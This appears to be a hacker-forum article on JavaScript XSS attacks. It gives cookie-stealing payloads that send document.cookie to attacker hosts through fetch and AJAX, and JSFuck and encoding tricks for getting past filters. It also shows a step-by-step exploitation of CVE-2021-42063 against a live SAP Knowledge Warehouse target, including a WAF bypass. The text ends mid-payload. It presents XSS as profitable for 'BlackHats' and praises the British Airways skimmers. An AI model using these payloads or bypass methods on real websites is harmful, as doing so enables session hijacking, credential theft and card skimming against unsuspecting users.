D2
Администратор
- Регистрация
- 19 Фев 2025
- Сообщения
- 4,380
- Реакции
- 0
XSS[is] JavaScript Damage
This article delves into JavaScript-based XSS, distinguishing it from HTML/CSS injection, and recaps the first part of this series, which focused on HTML/CSS injection. We will see full power of XSS and refer to cases which happened in the past. It is not an "alert(1)" article.
Content
1. JavaScript Based XSS2. Understanding JavaScript in Web Applications
3. XSS types
4. JavaScript Functionalities Exploited in XSS Attacks
5. Some XSS Cases
6. Rukopashnaya (Рукопашная)
JavaScript Based XSS
JavaScript-based XSS is a security exploit where an attacker injects malicious JavaScript code into a web page viewed by other users. Unlike HTML/CSS injection, which alters the structure or style of a webpage, JavaScript XSS targets the functionality, exploiting the dynamic nature of JavaScript.Key Differences from HTML/CSS Injection
Scope of Impact: JavaScript can manipulate browser APIs and user session data.Interactivity: JavaScript XSS can create interactive malicious scripts.
Data Access: JavaScript-based XSS can access sensitive information like cookies and tokens.
The first part of our series explored HTML and CSS injection vulnerabilities. HTML injection affects the page's structure, while CSS injection manipulates visual presentation. These attacks can disrupt a website's layout but generally don't execute malicious scripts or access user data.
Understanding JavaScript in Web Applications
JavaScript is pivotal in modern web development, driving interactive and dynamic aspects of web applications. However, its features also open avenues for vulnerabilities like XSS.Asynchronous Operations with AJAX
AJAX (Asynchronous JavaScript and XML) allows web applications to send and retrieve data from a server asynchronously, without interfering with the display and behavior of the existing page. This means web applications can update content dynamically, leading to a smoother user experience.Front-End Frameworks and Libraries
Frameworks like React, Angular, and Vue.js are JavaScript-based. They offer reusable components and reactive data binding, enabling the development of complex, single-page applications. Basically they are wildly used.Server-Side JavaScript
With the advent of Node.js, JavaScript can be used not only in client side, but also in server side. This has allowed developers to use a single programming language across the entire stack of web development.XSS types
Reflected XSS
Reflected XSS attacks occur when an attacker sends a malicious script to a user, often through a link. The script is then executed by the user's browser as part of the victim's interaction with the website.Request sent by user
Код: Скопировать в буфер обмена
http://xacker.mamkin/search?query=<script>alert('XSS')</script>Server side code:
Код: Скопировать в буфер обмена
Код:
var searchQuery = request.getParameter("query");
response.write("<div>Results for " + searchQuery + "</div>");Stored XSS
Stored XSS attacks occur when an attacker stores malicious script in a website's database, which is then rendered and executed when other users access the affected page.Let's say that the attacker sends a request which is stored in the DB, when the user open’s the website the code gets executed.
Code that gets executed in client side:
Код: Скопировать в буфер обмена
<script>fetch('http://xacker.mamkin/?cookie=' + document.cookie)</script>How it is stored in the client side:
Код: Скопировать в буфер обмена
Код:
<div>
User Comments:
<p><script>fetch('http://malicious-site.com/?cookie=' + document.cookie)</script></p>
</div>DOM-based XSS
DOM-based XSS attacks manipulate the Document Object Model (DOM) of the webpage, often by altering the URL and having JavaScript execute malicious code based on this manipulation.Request sent by user
Код: Скопировать в буфер обмена
http://xacker.mamkin/#<script>alert('XSS')</script>Client side JavaScript code
Код: Скопировать в буфер обмена
Код:
var fragment = window.location.hash.slice(1);
document.getElementById('content').innerHTML = fragment;JavaScript Functionalities Exploited in XSS Attacks
While JavaScript enriches web applications, it also introduces potential security risks. XSS attacks often exploit certain aspects of JavaScript to execute malicious code in a user’s browser.Manipulating the DOM
The Document Object Model (DOM) is an API for HTML and XML documents that provides a structured representation of the document and defines how documents can be accessed and manipulated. In XSS attacks, malicious scripts often manipulate the DOM to insert or modify web page content.For example, let’s say that we have a website like this
Код: Скопировать в буфер обмена
Код:
<!DOCTYPE html>
<html>
<head>
<title>Sample Page</title>
</head>
<body>
<div id="someElement">Initial Content</div>
</body>
</html>Код: Скопировать в буфер обмена
document.getElementById('someElement').innerHTML = 'XSScodeHere';In that case if the web service takes input from the user, JavaScript code dynamically changes the content of a webpage element, which is often used in XSS attacks to inject harmful content.
Код: Скопировать в буфер обмена
Код:
<!DOCTYPE html>
<html>
<head>
<title>Sample Page</title>
</head>
<body>
<div id="someElement">XSScodeHere</div>
</body>
</html>When we input, the source code (CTRL+U) won’t change, but the “inspect” that we do from the browser’s developer tools will show edited code. That’s the reason why I want to add chromium support to my tools, but I am still thinking about it as it will also use a lot of power.
P.S. Obviosly we have to replace "XSScodeHere with something malicious, I will give some examples below.
Event Handlers
JavaScript can assign functions to be executed when specific events occur, such as mouse clicks or keyboard inputs. Attackers can embed malicious code in these event handlers.In this case, the maliciousFunction could be code that performs unauthorized actions, such as stealing cookies or redirecting the user to a malicious website:
Код: Скопировать в буфер обмена
<button onclick="maliciousFunction()">Click Me</button>Another very simple example:
Код: Скопировать в буфер обмена
<button onclick="alert(1)">Click Me</button>AJAX Calls
AJAX can be exploited to send data to or retrieve data from a malicious server without the user’s knowledge.This script sends the user’s cookies to a malicious server:
Код: Скопировать в буфер обмена
Код:
$.ajax({
url: 'http://xacker.mamkin/steal-data',
type: 'POST',
data: { sensitiveData: document.cookie }
});Some XSS Cases
We all know that SQL Injection attacks have more threat to data extraction, basically they have more severity than XSS in most cases. That’s because the XSS usually needs a user interaction. What I am trying to say is that XSS is underrated for WhiteHats and overrated for BlackHats xD. Bug bounty programs won’t pay much for XSS as it requires user interaction, while it can be profitable in “dark” business. Let’s check some cases from the past:British Airways (2018): British Airways experienced a significant data breach due to an XSS attack executed by Magecart, a well-known hacker group. The group exploited a vulnerability in a JavaScript library called Feedify, which was used on the British Airways website. They modified the script to send customer data to a malicious server, mimicking British Airways' domain, thereby successfully performing credit card skimming on 380,000 booking transactions. The attackers were sophisticated enough to use an SSL certificate for their fake server, making it appear secure to users and browsers.
From WhiteHat’s perspective:
Well it led to 230$ million fine (https://www.reflectiz.com/blog/brit...arty-breach-leads-to-a-230-million-gdpr-fine/), if the vulnerability was reported, the reply probably would be either “The problem is in third party and don’t concern us”, or if WhiteHat reported it as “Use of Unmaintained Third Party Components (CWE-1104)”, then it would be considered as Low or Medium, because exploiting it would be considered as illegal and the impact would probably won’t be much as it wasn’t exploited. The bounty value would have been in range from 5-10k$, these numbers are not “fake”, they are the real deal (https://www.hackerone.com/application-security/reducing-risk-bug-bounty-program).
The conclusion here is that Bug Bounty platforms are great for companies to participate, to avoid this kind of behavior. When it comes to my own thoughts about this, WhiteHats do what they do mostly for their reputation and bounty is like a tip for them.
From BlackHat’s perspective:
I am not a BlackHat, correct me if I am wrong. I think that the BlackHat had to extract the data, otherwise showing the impact would be impossible and it is what they did, so nice move. The question is what happened to that data? I couldn’t find any information in the internet, obviously we know that it was sold, the main question is “To whom?”
Fortnite (2019): The popular online video game Fortnite faced a potential XSS attack, which could have led to a significant data breach. An unsecured, retired web page on the game's site contained a dangerous XSS vulnerability, giving attackers potential access to 200 million users. The attack could have allowed the theft of the game's virtual currency and recorded player conversations, providing valuable information for future attacks. Security researchers from Check Point discovered and reported this vulnerability to Fortnite.
There is a video PoC: As you can see from the video, it requires user interaction, so WhiteHat’s bounty here would be probably the same as it would have been with British Airways, BlackHat’s damage would be a little less than what it was done to British Airways. I guess we will in the future refer to this cases to understand how bad XSS attack was exploited xD
eBay (2015-2016): eBay experienced a severe XSS vulnerability where the website used a "url" parameter for redirection without validating its value. This oversight allowed attackers to inject malicious code into the platform, potentially gaining full access to eBay seller accounts, manipulating product listings, and stealing payment details. This vulnerability was actively exploited by attackers to manipulate high-value product listings, such as vehicles.
Vulnerability in British Airways was actually stored even though related to third party components, vulnerability in EpicGames was in its own domain, it was a CORS issue. If I understood the news correctly, the URL parameter was used to inject an iframe to a malicious website, so it is more of a CSP issue here. There is no normal source for me to give the exact information, but I am pretty sure that it is probably in the same level as vulnerability in Fortnite, or maybe slightly higher level, because it is in main domain. But in these cases that matters for WhiteHats rather than for BlackHats, that’s because BlackHats will probably use shortlink, because reflected XSS for stealing data will use a “suspicious” payload, it will be long, so in cases with Fortnite and Ebay, they should be same in eyes of a BlackHat (I think), for WhiteHat, eBay is more severe as it is in main domain, we don’t care how big payload can get, there is no “length of payload” in CVSS score xD
Now I have got an idea, we should create our own score and add “Length of Payload”, because it matters. I will call it XSS, eXploitation Severity Score.
Bypassing Input Sanitization
Attackers constantly develop sophisticated techniques to bypass client-side sanitization and security measures. Obviously there are a lot of methods for that and the ones I explain here are just parts of what is in the wild. We can see people daily doing X (twitter) posts, with Cloudflare/Akamai bypass, even though copy-pasting them can work sometimes, bypasses are done through manual tests, by understanding what gets blocked/sanitized.Using Advanced Encoding
Browsers can interpret various encodings, and attackers often use this feature to “hide” payloads.Код: Скопировать в буфер обмена
<script>alert('XSS');</script>This basic XSS injection might be blocked by sanitization filters. However, using hexadecimal or base64 encoding could bypass the filters:
Код: Скопировать в буфер обмена
<script>alert(String.fromCharCode(88,83,83));</script>You can see a lot of payloads like this, point here is not to “hide” the “XSS”, but to hide the “alert” itself, as far as I know, html/url encoding is also used. I haven’t used any encoding for XSS bypass.
Obfuscating Scripts
Obfuscation involves disguising the malicious script to evade detection.Код: Скопировать в буфер обмена
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">The onerror event triggers an eval() function, which executes the decoded script, displaying an alert with 'XSS'.
Obfuscating method that almost always works for me is use of JSFuck (https://jsfuck.com):
Код: Скопировать в буфер обмена
Код:
<script>
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])
<script>It translates as:
Код: Скопировать в буфер обмена
<script>alert(1)</script>Utilizing HTML5 Attributes
HTML5 introduced several new attributes which could be used to exploit XSS.Код: Скопировать в буфер обмена
<audio src="malicious.mp3" onerror="alert('XSS')"></audio>I have explained it in the previous article - https://xss.is/threads/103323/.
Rukopashnaya (Рукопашная)
Everything written above, is just basics, cases are different. I will explain hunting in the wild the way I do it. It can be through 2 ways, automated (or as I call it ak47), or manual (rukopashnaya). I have explain automation with kXSS and Bablo, so I will talk about other stuff. We all play with Nuclei sometimes, and they have a template for CVE-2021-42063. Let's check what is in there. I have a vulnerabe target and I will analyze in black box way. It may be the strangest analysis of an exploit.The Template:
Код: Скопировать в буфер обмена
Код:
id: CVE-2021-42063
info:
name: SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting
author: pdteam
severity: medium
description: |
SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser.
remediation: |
Upgrade to a patched version of SAP Knowledge Warehouse (>=7.5.1) to mitigate the XSS vulnerability.
reference:
- https://seclists.org/fulldisclosure/2022/Mar/32
- https://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
- https://twitter.com/MrTuxracer/status/1505934549217382409
- https://nvd.nist.gov/vuln/detail/CVE-2021-42063
- http://packetstormsecurity.com/files/166369/SAP-Knowledge-Warehouse-7.50-7.40-7.31-7.30-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-42063
cwe-id: CWE-79
epss-score: 0.00491
epss-percentile: 0.73418
cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: sap
product: knowledge_warehouse
shodan-query: http.favicon.hash:-266008933
zoomeye-query: +app:"SAP NetWeaver Application Server httpd
tags: cve2021,sap,xss,seclists,packetstorm,cve
http:
- method: GET
path:
- "{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<SVG ONLOAD=alert(document.domain)>"
- "SAPIKS2"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200<SVG ONLOAD=alert(document.domain)>. I have the following questions in my mind:1. Why is it HTML encoded?
2. Why is it uppercase?
3. Why it ends with .asp, what if i remove it?
Let's check it with my vulnerable target, my request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/PirivetPirivet.asp HTTP/2Response:
Код: Скопировать в буфер обмена
Код:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh" content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/PIRIVETPIRIVET">
</head>
<body>
</body>
</html>Request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/PirivetPirivet HTTP/2Response:
Код: Скопировать в буфер обмена
HTTP/2 404 Not FoundOkay, so it must end with .asp, time for HTML Injection:
Request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><h1>test</h1>.asp HTTP/2Response:
Image [1]
Request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><script>[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])</script>.asp HTTP/2Response:
Код: Скопировать в буфер обмена
HTTP/2 403 ForbiddenI think that problem is with "script" tag, so let's change it to "img" tag.
Request:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img%20src=x%20onerror=[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])>.asp HTTP/2Response:
Код: Скопировать в буфер обмена
Код:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh" content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/"><IMG SRC=X ONERROR=[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]